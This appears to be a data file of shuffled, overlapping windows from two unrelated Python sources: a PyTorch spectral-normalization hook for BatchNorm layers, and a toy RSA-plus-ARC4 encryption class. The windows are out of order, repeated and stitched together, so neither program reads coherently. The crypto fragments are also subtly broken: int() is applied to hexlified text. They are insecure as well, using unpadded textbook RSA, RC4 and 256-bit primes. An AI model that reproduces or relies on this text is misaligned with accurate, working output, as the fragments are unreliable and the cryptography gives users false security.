"weight / cur_sigma bias = bias / cur_sigma return weight, bias def remove(self,",
"the state dict # and also supports nn.init due to shared storage. module.register_buffer(fn.name,",
"fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name)",
"containing module name (str, optional): name of weight parameter eps (float, optional): epsilon",
"module name (str, optional): name of weight parameter eps (float, optional): epsilon for",
"Normalization borrowed from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be of Lipschtz",
"for batch normalization layers to be of Lipschtz constant sigma (default=1.0). \"\"\" import",
"normalization reparameterization from a module. Args: module (nn.Module): containing module name (str, optional):",
"shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0,",
"# buffer, which will cause weight to be included in the state dict",
"sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps = eps def compute_weight(self,",
"than 2, it is reshaped to 2D in power iteration method to get",
"directly assign as it could be an nn.Parameter and # gets added as",
"https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str, optional): name of weight parameter",
"cur_sigma bias = bias / cur_sigma return weight, bias def remove(self, module): weight",
"spectral norm :math:`\\sigma` of the weight matrix calculated using power iteration method. If",
"and also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn)",
"delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still",
"batch normalization layers to be of Lipschtz constant sigma (default=1.0). \"\"\" import torch",
"to assign weight back as fn.name because all sorts of # things may",
"a hook that calculates spectral norm and rescales weight before every :meth:`~Module.forward` call.",
"name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps = eps def",
"BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of",
"def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name]",
"torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name,",
"remove(self, module): weight = getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module,",
"sorts of # things may assume that it exists, e.g., when initializing weights.",
"is reshaped to 2D in power iteration method to get spectral norm. This",
"# and also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data)",
"inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias)",
"sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization from",
"spectral norm and rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization for",
"name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not found in",
"__init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps = eps",
"Adversarial Networks`_ . .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module",
"method. If the dimension of the weight tensor is greater than 2, it",
"(GANs) by rescaling the weight tensor with spectral norm :math:`\\sigma` of the weight",
"bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module,",
"module (nn.Module): containing module name (str, optional): name of weight parameter eps (float,",
"when initializing weights. # However, we can't directly assign as it could be",
"assign weight back as fn.name because all sorts of # things may assume",
"of weight parameter eps (float, optional): epsilon for numerical stability in calculating norms",
"Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma =",
"Instead, we register weight.data as a # buffer, which will cause weight to",
"BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps)",
"name (str, optional): name of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10))",
"still need to assign weight back as fn.name because all sorts of #",
"be an nn.Parameter and # gets added as a parameter. Instead, we register",
"weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\",",
"batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma,",
"The original module with the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10))",
"k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del",
"norm and rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative",
"hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not",
"Generative Adversarial Networks`_ . .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args:",
"original module with the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10,",
"getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name,",
">>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\"",
"bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module,",
"self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias = bias / cur_sigma",
"Spectral Normalization borrowed from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be of",
"import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12):",
"hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k]",
"/ cur_sigma bias = bias / cur_sigma return weight, bias def remove(self, module):",
"import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma",
"dict # and also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\",",
"to a parameter in the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\",
"isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm",
"as a parameter. Instead, we register weight.data as a # buffer, which will",
"norm :math:`\\sigma` of the weight matrix calculated using power iteration method. If the",
"setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module,",
"be included in the state dict # and also supports nn.init due to",
"to 2D in power iteration method to get spectral norm. This is implemented",
"module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a",
"that it exists, e.g., when initializing weights. # However, we can't directly assign",
"Spectral normalization stabilizes the training of discriminators (critics) in Generaive Adversarial Networks (GANs)",
"stability in calculating norms Returns: The original module with the spectal norm hook",
".. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W}",
"print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias",
"of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for",
"= spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook,",
"Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str, optional): name of weight",
"\"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0,",
"and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}'",
"bias def remove(self, module): weight = getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module,",
"weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module,",
". .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing",
"spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm)",
"weight.data as a # buffer, which will cause weight to be included in",
"cause weight to be included in the state dict # and also supports",
"+ \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still need to assign weight back",
"(str, optional): name of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>>",
"parameter. Instead, we register weight.data as a # buffer, which will cause weight",
"normalization to a parameter in the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})}",
"If the dimension of the weight tensor is greater than 2, it is",
"running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma)",
"module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\",",
"of the weight tensor is greater than 2, it is reshaped to 2D",
"it is reshaped to 2D in power iteration method to get spectral norm.",
"= getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig')",
"containing module name (str, optional): name of weight parameter Example: >>> m =",
"from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name =",
"hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size()",
"greater than 2, it is reshaped to 2D in power iteration method to",
"Lipschtz constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object):",
"of the weight matrix calculated using power iteration method. If the dimension of",
"it exists, e.g., when initializing weights. # However, we can't directly assign as",
"initializing weights. # However, we can't directly assign as it could be an",
"every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral",
"= BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module,",
"torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module)",
"= batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name,",
"get spectral norm. This is implemented via a hook that calculates spectral norm",
"weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g =",
"epsilon for numerical stability in calculating norms Returns: The original module with the",
"BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization",
"weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g =",
"and # gets added as a parameter. Instead, we register weight.data as a",
":meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral Normalization",
"cur_sigma return weight, bias def remove(self, module): weight = getattr(module, self.name) bias =",
"= module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight)",
"the weight tensor with spectral norm :math:`\\sigma` of the weight matrix calculated using",
"assume that it exists, e.g., when initializing weights. # However, we can't directly",
"self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\")",
"for numerical stability in calculating norms Returns: The original module with the spectal",
"norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>>",
"sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self,",
"the weight matrix calculated using power iteration method. If the dimension of the",
"eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return",
":math:`\\sigma` of the weight matrix calculated using power iteration method. If the dimension",
"by rescaling the weight tensor with spectral norm :math:`\\sigma` of the weight matrix",
"a module. Args: module (nn.Module): containing module name (str, optional): name of weight",
"del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not found in {}\".format( name,",
"weight before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_ .",
"return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter",
"if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else:",
"/ cur_sigma return weight, bias def remove(self, module): weight = getattr(module, self.name) bias",
"weight back as fn.name because all sorts of # things may assume that",
"discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling the weight tensor with",
"hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not found in {}\".format(",
"optional): name of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m)",
"Networks (GANs) by rescaling the weight tensor with spectral norm :math:`\\sigma` of the",
"can't directly assign as it could be an nn.Parameter and # gets added",
"self.name = name self.sigma = sigma self.eps = eps def compute_weight(self, module): weight",
"= bias / cur_sigma return weight, bias def remove(self, module): weight = getattr(module,",
"fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in",
"r\"\"\"Removes the spectral normalization reparameterization from a module. Args: module (nn.Module): containing module",
"before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_ . ..",
"weight matrix calculated using power iteration method. If the dimension of the weight",
"of Lipschtz constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class",
"bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module,",
"(nn.Module): containing module name (str, optional): name of weight parameter eps (float, optional):",
">>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'):",
"torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the",
"weight parameter eps (float, optional): epsilon for numerical stability in calculating norms Returns:",
"= max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias = bias",
"else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g)",
"_`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name",
"# print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma",
"an nn.Parameter and # gets added as a parameter. Instead, we register weight.data",
"\"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name:",
">>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name",
"because all sorts of # things may assume that it exists, e.g., when",
"module. Args: module (nn.Module): containing module name (str, optional): name of weight parameter",
"This is implemented via a hook that calculates spectral norm and rescales weight",
"via a hook that calculates spectral norm and rescales weight before every :meth:`~Module.forward`",
"'_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma =",
"= getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma",
"10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and",
"fn.name because all sorts of # things may assume that it exists, e.g.,",
"we can't directly assign as it could be an nn.Parameter and # gets",
"name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias =",
"self.eps = eps def compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias",
"torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight =",
"matrix calculated using power iteration method. If the dimension of the weight tensor",
"name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization",
"2D in power iteration method to get spectral norm. This is implemented via",
"weight) module.register_parameter(\"bias_orig\", bias) # We still need to assign weight back as fn.name",
"\\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral",
"r\"\"\"Applies spectral normalization to a parameter in the given module. .. math:: \\mathbf{W}",
"we register weight.data as a # buffer, which will cause weight to be",
"Networks`_ . .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module):",
"eps=1e-12): self.name = name self.sigma = sigma self.eps = eps def compute_weight(self, module):",
"implemented via a hook that calculates spectral norm and rescales weight before every",
"cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias =",
"Generaive Adversarial Networks (GANs) by rescaling the weight tensor with spectral norm :math:`\\sigma`",
"Args: module (nn.Module): containing module name (str, optional): name of weight parameter eps",
"constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def",
"bias / cur_sigma return weight, bias def remove(self, module): weight = getattr(module, self.name)",
"normalization stabilizes the training of discriminators (critics) in Generaive Adversarial Networks (GANs) by",
"numerical stability in calculating norms Returns: The original module with the spectal norm",
"assign as it could be an nn.Parameter and # gets added as a",
"sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in the given module. ..",
"from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be of Lipschtz constant sigma"
] |
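The list above is a set of shuffled windows over a single PyTorch source file: a `BatchNormSpectralNorm` forward-pre-hook that bounds a BatchNorm layer's Lipschitz constant by dividing `weight` and `bias` by `max(|weight / sqrt(running_var)|)`, clamped from below by `sigma`. The condensed sketch below reconstructs that mechanism from the fragments; it is not the verbatim original — the always-recompute `__call__` and the `+ self.eps` guard inside the square root are simplifications (the fragments only recompute in training mode and detach in eval mode).

```python
import torch
import torch.nn as nn

class BatchNormSpectralNorm:
    """Forward-pre-hook sketch: rescale a BatchNorm's gamma/beta so the
    layer's largest singular value max_i |gamma_i| / sqrt(var_i) stays bounded."""

    def __init__(self, name='weight', sigma=1.0, eps=1e-12):
        self.name = name
        self.sigma = sigma
        self.eps = eps

    def compute_weight(self, module):
        weight = getattr(module, self.name + '_orig')
        bias = getattr(module, 'bias_orig')
        running_var = getattr(module, 'running_var')
        with torch.no_grad():
            # Largest singular value of the BatchNorm affine map; the divisor
            # is clamped from below by self.sigma, as in the fragments.
            cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var + self.eps)))
            cur_sigma = max(float(cur_sigma), self.sigma)
        return weight / cur_sigma, bias / cur_sigma

    def __call__(self, module, inputs):
        # Simplification: recompute on every forward call.
        weight, bias = self.compute_weight(module)
        setattr(module, self.name, weight)
        setattr(module, 'bias', bias)

    @staticmethod
    def apply(module, name='weight', sigma=1.0, eps=1e-12):
        fn = BatchNormSpectralNorm(name, sigma, eps)
        weight = module._parameters[name]
        bias = module._parameters['bias']
        delattr(module, name)
        delattr(module, 'bias')
        module.register_parameter(name + '_orig', weight)
        module.register_parameter('bias_orig', bias)
        # Keep plain-tensor aliases under the original names so the layer
        # still exposes .weight/.bias before the first forward call.
        setattr(module, name, weight.data)
        setattr(module, 'bias', bias.data)
        module.register_forward_pre_hook(fn)
        return fn

def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12):
    BatchNormSpectralNorm.apply(module, name, sigma, eps)
    return module

m = bn_spectral_norm(nn.BatchNorm2d(10))
out = m(torch.randn(2, 10, 4, 4))   # hook rescales weight/bias, then BN runs
```

The parameter re-registration under `weight_orig`/`bias_orig` mirrors `torch.nn.utils.spectral_norm`: gradients flow to the `_orig` parameters while the divided tensors are re-assigned as plain attributes before each forward.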
[
"* i + 1 if(c % a == 0): c = c//a break",
"return a * b // gcd(a, b) def imod(a, n): i = 1",
"params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message =",
"from rsa import prime from arc4 import ARC4 def gcd(a, b): while b",
"= params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k",
"def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key,",
"return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e'])",
"- 1) self.e = 65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p,",
"p, q, N, phi, e, d): self.p = p self.q = q self.N",
"p self.q = q self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q",
"self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey)",
"b = b, a % b return a def lcm(a, b): return a",
"= imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def",
"% a == 0): c = c//a break i = i+1 return c",
"__init__(self, bit_length=256): p, q = 0, 0 while p == q: p =",
"= phi self.e = e self.d = d def get_pub(self): return (self.N, self.e)",
"lcm(self.p - 1, self.q - 1) self.e = 65537 self.d = imod(self.e, self.phi)",
"return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q = params['q']",
"(self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode()))",
"def encrypt(self, m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m,",
"= token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey,",
"cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if __name__ == \"__main__\":",
"return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p, q, N, phi,",
"q self.N = N self.phi = phi self.e = e self.d = d",
"= prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q = q self.N =",
"= i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message)",
"arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def",
"cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self,",
"0): c = c//a break i = i+1 return c def arc4_encrypt(key, message):",
"def gcd(a, b): while b != 0: a, b = b, a %",
"c = n * i + 1 if(c % a == 0): c",
"self.p = p self.q = q self.N = N self.phi = phi self.e",
"message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key,",
"b != 0: a, b = b, a % b return a def",
"self.N = N self.phi = phi self.e = e self.d = d def",
"def __init__(self, bit_length=256): p, q = 0, 0 while p == q: p",
"def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int):",
"c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def",
"b): return a * b // gcd(a, b) def imod(a, n): i =",
"int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res =",
"decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def",
"break i = i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher",
"= self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if",
"return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher",
"= arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher)",
"plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p, q =",
"self.q - 1) self.e = 65537 self.d = imod(self.e, self.phi) def dump(self): return",
"message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10)",
"self.q = q self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q -",
"65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e,",
"== 0): c = c//a break i = i+1 return c def arc4_encrypt(key,",
"get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey):",
"a * b // gcd(a, b) def imod(a, n): i = 1 while",
"ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain",
"params['p'] self.q = params['q'] self.N = params['N'] self.phi = params['phi'] self.e = params['e']",
"self.p = p self.q = q self.N = self.p*self.q self.phi = lcm(self.p -",
"prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q = q self.N = self.p*self.q",
"= 65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi,",
"= ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p,",
"binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q = params['q'] self.N",
"prime from arc4 import ARC4 def gcd(a, b): while b != 0: a,",
"= c//a break i = i+1 return c def arc4_encrypt(key, message): arc4 =",
"rsa import prime from arc4 import ARC4 def gcd(a, b): while b !=",
"(self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if not",
"params): self.p = params['p'] self.q = params['q'] self.N = params['N'] self.phi = params['phi']",
"return plain class SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0 while",
"class SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0 while p ==",
"p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q = q self.N",
"pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res))",
"return (self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if",
"secrets import token_hex from rsa import prime from arc4 import ARC4 def gcd(a,",
"= p self.q = q self.N = N self.phi = phi self.e =",
"+ 1 if(c % a == 0): c = c//a break i =",
"get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int): m",
"i = i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher =",
"other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA):",
"// gcd(a, b) def imod(a, n): i = 1 while True: c =",
"params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k =",
"tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self,",
"* b // gcd(a, b) def imod(a, n): i = 1 while True:",
"b) def imod(a, n): i = 1 while True: c = n *",
"ARC4 def gcd(a, b): while b != 0: a, b = b, a",
"q = 0, 0 while p == q: p = prime.getprime(bit_length) q =",
"import time import base64 import binascii from secrets import token_hex from rsa import",
"decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self,",
"other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return",
"def __init__(self, params): self.p = params['p'] self.q = params['q'] self.N = params['N'] self.phi",
"arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return",
"class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q = params['q'] self.N =",
"= params['p'] self.q = params['q'] self.N = params['N'] self.phi = params['phi'] self.e =",
"q self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q - 1) self.e",
"1 if(c % a == 0): c = c//a break i = i+1",
